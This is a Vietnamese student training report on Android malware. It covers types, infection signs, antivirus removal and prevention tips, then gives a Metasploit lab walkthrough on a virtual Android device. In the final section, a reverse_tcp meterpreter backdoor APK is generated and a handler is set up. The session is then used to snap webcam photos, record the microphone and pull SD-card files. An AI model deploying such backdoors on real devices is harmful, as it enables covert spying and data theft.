2. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
2
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ ATHENA
BÀI BÁO CÁO 2
ANDROID MALWARE VÀ CÁCH HACK
ANDROID
CBHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt
3. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
3
Mục lục
1. Malware là gì?.....................................................................................................................................4
2. Phân loại ..............................................................................................................................................5
3. Dấu hiệu bị nhiễm các phần mềm độc hại ........................................................................................5
4. Loại bỏ phần mềm độc hại từ Android.............................................................................................6
5. Một số cách hạn chế lây nhiễm ..........................................................................................................6
6. Hack android bằng metasploit trên Kali Linux ...............................................................................7
4. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
4
1. Malware là gì?
Malware (phần mềm độc hại) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính
được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc và thay đổi các thực thi của hệ điều hành
cũng như các chương trình ứng dụng mà không có sự cho phép của người dùng và bằng một cách
nào đó mà người dùng nếu không để ý cũng không thể phát hiện được những thay đổi đó.
Phần mềm độc hại đã xuất hiện từ rất lâu trên những hệ điều hành máy tính như Windows, các
máy tính MAC và Linux (ở một mức độ thấp hơn), và bây giờ nó đã trở thành một mối nguy hại
không nhỏ cho các thiết bị di động chạy Android. Sự có mặt của Android khiến cho các phần mềm
độc hại thêm phần thích thú, tích cực tấn công hơn tới đông đảo người dùng Android. Nói về vấn
đề này, Timothy Armstrong, một chuyên gia bảo mật tại Kaspersky Lab, cho biết: “Malware trên
Android được phát hiện nhiều hơn hầu như mỗi ngày. Thời gian gần đây, chúng tôi đã phát hiện
ra ba nhà phát triển ứng dụng (mà có khi là từ cùng 1 người) với tên gọi MYOURNET,
Kingmall2010, we20092020 đã cung cấp các ứng dụng để tải về miễn phí trên Android Market,
mà hầu hết các ứng dụng đó đều chứa mã độc”.
5. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
5
Năm 2012 là năm thứ hai cho thấy sự bùng nổ của phần mềm độc hại cho Android. Từ tám chương
trình độc hại duy nhất vào tháng 1 năm 2011, tỷ lệ phát hiện trung bình hàng tháng phần mềm độc
hại mới tấn công vào Android trong năm 2011 đã lên đến hơn 800 mẫu. Trong năm 2012,
Kaspersky Lab đã xác định trung bình 6.300 mẫu phần mềm độc hại trên thiết bị di động mới mỗi
tháng. Nhìn chung, trong năm 2012 số lượng mẫu độc hại cho Android được biết đến nhiều tăng
hơn tám lần.
2. Phân loại
Đa số các phần mềm độc hại Android có thể được chia thành ba nhóm chính dựa theo chức năng:
- SMS Trojans: bòn rút tài khoản di động của các nạn nhân bằng cách gửi tin nhắn SMS đến
các số điện thoại được đánh giá cao.
- Backdoors: cung cấp truy cập trái phép vào smartphone, cài đặt các chương trình độc hại
khác hoặc ăn cắp dữ liệu cá nhân của người dùng.
- Cuối cùng là các phần mềm gián điệp nhằm mục tiêu thu thập trái phép dữ liệu cá nhân,
chẳng hạn như sổ địa chỉ và mật khẩu (hoặc thậm chí hình ảnh cá nhân).
Trong nửa đầu năm 2012, Backdoors, tin nhắn SMS, Trojans và phần mềm gián điệp chiếm 51%
các phần mềm độc hại cho Android mới được phát hiện. Trong bảng xếp hạng Top Ten phần mềm
độc hại cho Android đã bị chặn bởi Kaspersky Mobile Security hoặc Kaspersky Tablet Security,
SMS Trojans là phổ biến nhất và các ứng dụng hiển thị quảng cáo không mong muốn cho người
sử dụng ở vị trí thứ hai. Ít phổ biến rộng rãi nhưng nguy hiểm nhất là Trojans ngân hàng trên di
động thường xuyên làm việc kết hợp với các máy tính để bàn, ví dụ như Carberp.
Nền tảng Android cho phép cài đặt phần mềm từ các nguồn không tin cậy, và là một trong những
cách tốt nhất để đảm bảo sự lây nhiễm từ việc cài đặt các chương trình từ những trang web đáng
ngờ. Tuy nhiên, phần mềm độc hại trên nền tảng phân phối ứng dụng chính thức Google Play là
một xu hướng bắt đầu vào năm 2011 và tiếp tục trong năm 2012, bất chấp những nỗ lực tốt nhất
của Google để làm giảm hoạt động tội phạm mạng. Một trong những ví dụ “khác thường” nhất
của phần mềm độc hại trên di động trong năm 2012 là "Find and Call", ứng dụng đã len lỏi được
vào Google Play cũng như kho ứng dụng của Apple.
3. Dấu hiệu bị nhiễm các phần mềm độc hại
Cũng giống như trên máy tính, khi bị nhiễm malware, thiết bị Android của bạn sẽ có một số hành
động khác thường và bạn không thể thay đổi được bất kỳ điều gì.
- Sử dụng dữ liệu không rõ ràng: có rất nhiều phần mềm độc hại tồn tại để thu thập dữ liệu
về tài khoản, số thẻ tín dụng, danh bạ, vv... Một khi có được các thông tin này, nó sẽ tự
động được chuyển tiếp về cho người đã tạo ra nó. Và trong nhiều trường hợp, việc chuyển
giao thông tin này sẽ dẫn đến sự khác lạ trong sử dụng dữ liệu.
- Hiệu suất của thiết bị kém: tùy thuộc vào thời gian sử dụng và mức độ nghiêm trọng của
việc lây nhiễm mà hiệu suất điện thoại của bạn sẽ bị giảm đi nhiều hay ít, đặc biệt là khi
bạn đã khởi động lại thiết bị mà các vấn đề không được giảm bớt.
6. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
6
- Thời lượng pin bị giảm: do hầu hết các phần mềm độc hại đều được thiết kế để chạy nền
trong hệ thống, nên nó sẽ làm sụt giảm đáng kể thời lượng pin trên thiết bị của bạn.
4. Loại bỏ phần mềm độc hại từ Android
Cách tốt nhất để loại bỏ malware là cài thêm một chương trình chống virus trên thiết bị. Tuy nhiên,
bạn hãy cẩn thận và chỉ cài đặt các ứng dụng có tên tuổi được nhiều người sử dụng, nếu không thì
bạn sẽ lại rước thêm của nợ về máy. Dưới đây là một số phần mềm miễn phí mà bạn có thể tham
khảo:
- Avast! Mobile Security (http://itechnews360.com/avastmobile): chương trình có thể quét
toàn bộ ứng dụng trên thiết bị theo lựa chọn của người dùng, hoặc tự động quét theo lịch
trình được đặt sẵn. Khi duyệt web, nó sẽ phát hiện và ngăn chặn các liên kết nhiễm
malware, giám sát lưu lượng truy cập ra và vào. Bên cạnh đó, nó còn các tính năng tiên
tiến khác như chống trộm, tường lửa thông minh và lọc các tin nhắn SMS hoặc cuộc gọi.
- AVG Antivirus Security (http://itechnews360.com/avgsecurity): ứng dụng này sẽ quét tất
cả các tập tin mới và các ứng dụng mà nó nghi ngờ, sau đó, cung cấp cho bạn các thiết lập
và những lời khuyên để xử lý các lỗ hổng bảo mật. Nó cũng được trang bị thêm một số tính
năng tiên tiến khác như giám sát băng thông và các biện pháp chống trộm.
- 360 Mobile Security (http://itechnews360.com/360security): cung cấp các bảo vệ dựa vào
cơ sở dữ liệu luôn được cập nhật trên đám mây, giúp bạn phát hiện các lỗ hổng bảo mật và
tối ưu hóa các thiết lập tự động. Nhìn chung, đây là chương trình chống virus dễ sử dụng
và có giao diện khá đẹp mắt.
5. Một số cách hạn chế lây nhiễm
Cách duy nhất để ngăn chặn phần mềm độc hại là hạn chế tải về các ứng dụng từ bên ngoài Google
Play, không cắm thiết bị Android vào máy tính (thay vào đó hãy sử dụng các ứng dụng để biến
Android thành ổ đĩa mạng, chẳng hạn như là AirDroid, DroidNAS, vv...), và áp dụng thêm một số
mẹo nhỏ dưới đây:
- Kiểm tra đánh giá ứng dụng: khi bạn tìm thấy một ứng dụng mới và muốn cài đặt, điều đầu
tiên bạn nên làm là tìm đọc những nhận xét từ những người dùng khác. Qua đó, bạn có thể
cảm nhận được phần nào về ứng dụng và đưa ra những quyết định đúng đắn.
- Kiểm tra hồ sơ của nhà phát triển: nếu chưa an tâm với những đánh giá của người dùng,
bạn hãy tiếp tục kiểm tra thêm phần hồ sơ của nhà phát triển ứng dụng để xem nó có đáng
tin cậy hay không.
- Hãy xem rõ các điều lệ khi cấp quyền cho ứng dụng: khi bấm nút Install để thiết bị bắt đầu
tải về và cài đặt, bạn hãy xem rõ toàn bộ các quyền mà ứng dụng yêu cầu, nếu thấy có điều
gì đó quá đáng hoặc không hợp lý, hãy ngưng việc cài đặt ngay lập tức. Chẳng hạn như các
ứng dụng đọc báo, đọc truyện hay xem tivi mà lại có yêu cầu gửi tin nhắn đi từ điện thoại
của bạn là không hợp lý!
- Thường xuyên quét toàn bộ thiết bị: để thực hiện việc này, bạn có thể cài đặt một trong các
phần mềm chống virus được giới thiệu bên trên, và hãy quét qua toàn bộ thiết bị mỗi ngày,
hoặc ít nhất mỗi tuần một lần.
7. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
7
6. Hack android bằng metasploit trên Kali Linux
Trước tiên chúng ta sẽ tạo ra một backdoor bằng cách dùng lệnh:
msfpayload android/meterpreter/reverse_tcp lhost=192.168.159.128 lport=8080 R >
/root/Desktop/app.apk
Trong đó 192.168.159.128 là địa chỉ ip của máy Kali. Chúng ta có thể xem nó bằng cách dùng
lệnh:
ifconfig
8. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
8
Và đây là file app.apk mà chúng ta vừa tạo
Tiếp theo chúng ta mở metasploit bằng cách dùng lệnh:
msfconsole
9. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
9
Chúng ta cài đặt các thông số cần thiêt
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.159.128
set lport 8080
Với lhost và lport giống với khi chúng ta tạo file app.apk
Ta mở một cái android ảo và tải về file app.apk, cài đặt và mở lên được giao diện như dưới, nhấp
vào nút Reverse_tcp:
10. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
10
Vậy là ta đã kết nối thành công tới máy android này, ở msfconsole sẽ như sau:
Để xem thông tin về máy, nhập lệnh sysinfo
Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
11. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
11
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera
ở phần trước. Ví dụ như sau:
Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
12. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
12
Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
Ta tải file app.apk trong thư mục Download của sdcard
Dùng lệnh cd /sdcard/Download để vào thư mục
13. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
13
Như trên hình, ta thấy 1 file là app.apk, để tải về máy, ta nhập lệnh
download app.apk
Và file này sẽ được tải về thư mục root của máy Kali
Hết